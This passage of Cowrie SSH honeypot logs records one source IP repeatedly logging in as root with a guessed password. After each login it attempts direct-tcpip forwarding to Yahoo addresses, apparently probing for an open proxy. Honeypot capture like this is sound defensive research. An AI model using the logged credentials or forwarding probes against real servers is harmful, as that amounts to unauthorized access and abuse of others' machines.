t-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.997699Z","src_ip":"213.209.150.239","session":"cc68526b66fd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:32.279829Z","src_ip":"213.209.150.239","session":"cc68526b66fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":24206,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24206","sensor":"my-vps","timestamp":"2025-08-26T01:05:32.337352Z","session":"cc68526b66fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:32.394254Z","src_ip":"213.209.150.239","session":"cc68526b66fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":4458,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:4458","sensor":"my-vps","timestamp":"2025-08-26T01:05:32.550997Z","session":"cc68526b66fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:32.607623Z","src_ip":"213.209.150.239","session":"cc68526b66fd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:32.665774Z","src_ip":"213.209.150.239","session":"cc68526b66fd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37082,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4bdf9cff888","protocol":"ssh","message":"New connection: 213.209.150.239:37082 (1.2.3.4:22) [session: d4bdf9cff888]","sensor":"my-vps","timestamp":"2025-08-26T01:05:32.711767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:32.712380Z","src_ip":"213.209.150.239","session":"d4bdf9cff888"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:32.759560Z","src_ip":"213.209.150.239","session":"d4bdf9cff888"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:32.993945Z","src_ip":"213.209.150.239","session":"d4bdf9cff888"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":32330,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:32330","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.042576Z","session":"d4bdf9cff888"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.089900Z","src_ip":"213.209.150.239","session":"d4bdf9cff888"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":23270,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:23270","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.225438Z","session":"d4bdf9cff888"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.272468Z","src_ip":"213.209.150.239","session":"d4bdf9cff888"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.320416Z","src_ip":"213.209.150.239","session":"d4bdf9cff888"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37138,"dst_ip":"1.2.3.4","dst_port":22,"session":"d875b1e5eed0","protocol":"ssh","message":"New connection: 213.209.150.239:37138 (1.2.3.4:22) [session: d875b1e5eed0]","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.366737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.376078Z","src_ip":"213.209.150.239","session":"d875b1e5eed0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.414138Z","src_ip":"213.209.150.239","session":"d875b1e5eed0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.648881Z","src_ip":"213.209.150.239","session":"d875b1e5eed0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":7099,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:7099","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.698351Z","session":"d875b1e5eed0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.745620Z","src_ip":"213.209.150.239","session":"d875b1e5eed0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":4532,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4532","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.889537Z","session":"d875b1e5eed0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.936736Z","src_ip":"213.209.150.239","session":"d875b1e5eed0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:33.985101Z","src_ip":"213.209.150.239","session":"d875b1e5eed0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37181,"dst_ip":"1.2.3.4","dst_port":22,"session":"f50f6a1c320f","protocol":"ssh","message":"New connection: 213.209.150.239:37181 (1.2.3.4:22) [session: f50f6a1c320f]","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.040678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.041333Z","src_ip":"213.209.150.239","session":"f50f6a1c320f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.098258Z","src_ip":"213.209.150.239","session":"f50f6a1c320f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.380540Z","src_ip":"213.209.150.239","session":"f50f6a1c320f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":12876,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:12876","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.438021Z","session":"f50f6a1c320f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.494859Z","src_ip":"213.209.150.239","session":"f50f6a1c320f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":17827,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:17827","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.651086Z","session":"f50f6a1c320f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.707875Z","src_ip":"213.209.150.239","session":"f50f6a1c320f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.765505Z","src_ip":"213.209.150.239","session":"f50f6a1c320f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37233,"dst_ip":"1.2.3.4","dst_port":22,"session":"122743c8079e","protocol":"ssh","message":"New connection: 213.209.150.239:37233 (1.2.3.4:22) [session: 122743c8079e]","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.821152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.822392Z","src_ip":"213.209.150.239","session":"122743c8079e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:34.879112Z","src_ip":"213.209.150.239","session":"122743c8079e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.161743Z","src_ip":"213.209.150.239","session":"122743c8079e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":21084,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21084","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.219246Z","session":"122743c8079e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.275854Z","src_ip":"213.209.150.239","session":"122743c8079e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":7483,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:7483","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.430919Z","session":"122743c8079e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.487562Z","src_ip":"213.209.150.239","session":"122743c8079e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.545700Z","src_ip":"213.209.150.239","session":"122743c8079e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37295,"dst_ip":"1.2.3.4","dst_port":22,"session":"84dd11683add","protocol":"ssh","message":"New connection: 213.209.150.239:37295 (1.2.3.4:22) [session: 84dd11683add]","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.591931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.592862Z","src_ip":"213.209.150.239","session":"84dd11683add"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.639997Z","src_ip":"213.209.150.239","session":"84dd11683add"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.874748Z","src_ip":"213.209.150.239","session":"84dd11683add"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":730,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:730","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.923079Z","session":"84dd11683add"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:35.970454Z","src_ip":"213.209.150.239","session":"84dd11683add"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":25587,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25587","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.109491Z","session":"84dd11683add"}
